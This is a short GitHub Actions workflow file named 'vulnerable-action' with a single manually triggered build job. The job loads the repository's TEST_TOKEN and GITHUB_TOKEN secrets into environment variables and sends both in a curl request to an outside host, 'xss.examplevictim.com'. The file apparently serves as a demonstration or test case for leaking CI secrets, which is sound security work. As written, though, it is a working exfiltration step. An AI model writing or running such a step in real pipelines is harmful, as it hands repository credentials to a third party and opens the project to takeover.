name: vulnerable-action
run-name: ${{ github.actor }} is testing things
on: [workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Build
        env:
                secret_test: ${{secrets.TEST_TOKEN}}
                gh: ${{secrets.GITHUB_TOKEN}}
        run: curl -v "http://xss.examplevictim.com/?x=$gh&t=$secret_test"
